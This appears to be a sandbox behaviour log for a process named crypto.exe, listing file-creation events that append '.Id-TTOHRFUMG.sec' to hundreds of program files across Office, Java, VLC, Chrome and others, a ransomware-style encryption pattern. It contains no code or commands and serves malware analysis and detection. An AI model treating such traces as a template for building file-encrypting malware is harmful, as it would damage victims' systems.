File created	C:\Program Files\Java\jre7\lib\zi\Asia\Hebron.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Perth.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Generic.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FORMCTL.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_chromaprint_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02041_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00034_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115863.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\drag.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01080_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00057_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\ucrtbase.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DISTLSTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\GMT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_italic.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-conio-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java_crw_demo.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00160_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MLSHEXT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\http.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\cy.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Iqaluit.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Caracas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SAVE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libdtv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\is.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285698.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14752_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\GIGGLE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MIMEDIR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0221903.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149481.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099196.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\verify.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jfr\profile.jfc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18209_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\gu.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099173.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21316_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREETING.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWRECE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21307_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADVZIP.DIC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\main.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232171.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\eventlog_provider.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105288.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_disable.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\an.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Karachi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EquityLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSQRY32.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsMacroTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS2BARB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SETLANG.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\splash.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01734_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL081.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00454_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3ES.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\gui\libqt_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmpnssui.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Fortaleza.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBrowserUpgrade.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\tt.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OIS_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\LoanAmortization.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\en-US\OmdProject.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.DOC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\gfserrortogroove.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00419_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCRD98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN011.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\klist.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\hprof.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\java.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SEQCHK10.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sw.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\gu.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Dubai.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Thule.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02077_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08808_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00012_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MOR6INT.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libopus_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_id.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-disable.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18192_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092334.pma.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\libEGL.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\WMPDMC.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_buttongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\psfontj2d.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\liba52_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoDev.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-api-visual.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02437_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ku.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLADD.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Montreal.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libheadphone_channel_mixer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Verve.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLLIBR.DLL.Id-TTOHRFUMG.sec	crypto.exe
